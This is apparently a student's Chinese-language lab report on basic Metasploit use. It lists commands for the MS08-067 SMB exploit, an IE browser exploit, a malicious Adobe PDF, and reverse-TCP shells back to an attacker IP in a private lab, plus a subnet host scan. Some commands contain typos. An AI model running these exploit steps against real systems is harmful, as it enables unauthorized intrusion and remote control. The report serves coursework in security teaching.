Exp5 MSF基础应用 20164303景圣

时间:2023-12-28 16:49:20

一、实践内容

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

1.一个主动攻击实践,如ms08_067; (成功)

2.一个针对浏览器的攻击,如ms10_018_ie_behaviors;(成功且唯一)

3. 一个针对客户端的攻击,如Adobe;(成功)

4.成功应用任何一个辅助模块。(成功)

二、实践过程

1.实现主动攻击,使用ms08_067漏洞

被攻击机:WindowsXP sp3.

(1)输入指令使用ms08_067漏洞攻击程序 use exploit/windows/smb/ms08_067_netapi

Exp5 MSF基础应用 20164303景圣

(2)配置参数

输入指令 set payload generic/shell_reverse_tcp(设置有效攻击载荷)

设置攻击机ip  set LHOST 192.168.1.234

设置攻击端口  set LPORT 4303

设置靶机ip  set RHOST 192.168.1.229

设置自动选择目标系统类型  set target 10

Exp5 MSF基础应用 20164303景圣

(3)设置完成后输入指令  exploit,可以看到,已经获得了xp的权限

Exp5 MSF基础应用 20164303景圣

2.实现针对浏览器的攻击,使用ms10_002漏洞

被攻击环境:WindowsXP sp2+ie 6.0

(1)使用指令 use exploit/windows/browser/ms10_018_ie_behaviors

    选择一个payload  set payloads windows/meterpreter/reverse_tcp

设置相关参数,

set LHOST 192.168.1.234攻击方IP;

     set LPORT 4303 攻击方端口;

set target 0

set URIPATH 4303js 资源标识符路径设置;

Exp5 MSF基础应用 20164303景圣

Exp5 MSF基础应用 20164303景圣

(3)输入指令 exploit 后,可以看到生成了名为http://192.168.1.234:8080/4303js 的链接

(4)在xp系统里访问链接  http://192.168.1.234:8080/4303js,此时IE卡死,崩溃

Exp5 MSF基础应用 20164303景圣

(5)输入指令 sessions -i 1 后,成功获取到xp的cmd

Exp5 MSF基础应用 20164303景圣

3.实现针对客户端的攻击

被攻击环境:WindowsXP sp2+Adobe Readers 9.0

(1)输入指令 use windows/fileformat/adobe_cooltype_sing

(2)配置渗透攻击所需的配置项:

  设置载荷: set payload windows/meterpreter/reverse_tcp

  设置攻击机IP: set LHOST 192。168.1.234

  设置端口: set LPORT 4303

  设置产生的文件: set FILENAME 4303.pdf

  设置完成后键入 exploit

Exp5 MSF基础应用 20164303景圣

(3)根据路径找到该pdf文件放到靶机里。(需要先设置,勾选显示隐藏文件,再进行寻找)

Exp5 MSF基础应用 20164303景圣

(4)使用命令 back 退出当前模块,启动一个对应于载荷的监听端,等待靶机回连

输入指令:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.234
set lport

Exp5 MSF基础应用 20164303景圣

(5)在靶机中打开该pdf,回连成功

Exp5 MSF基础应用 20164303景圣

4 成功应用任何一个辅助模块。

使用ARP请求枚举本地局域网中所有活跃主机

输入指令: use auxiliary/scanner/discovery/udp_seep

show options
    将RHOSTS设置为 192.168.1.0/24,即扫描子网号为192.168.1.0的子网内的所有主机

Exp5 MSF基础应用 20164303景圣

可以看到目标主机的IP192.168.1.168在列表之中。

三、基础问题回答

用自己的话解释什么是exploit,payload,encode.

exploit就是执行攻击程序,利用漏洞对靶机进行相应的攻击;payload就是漏洞攻击的有效载荷,利用漏洞实现不同的攻击手段;encode就是编码器,就是对攻击进行伪装。

四、实验总结与体会

这次实验我认为主要看网,网不好虚拟机都下不下来。msf的功能固然强大,但攻击成功的前提是被攻击的主机存在我们需要的漏洞。如果我们能够重视计算机安全的保护,及时对软件和系统进行更新,修补漏洞,我们的电脑收到攻击的可能性会很低。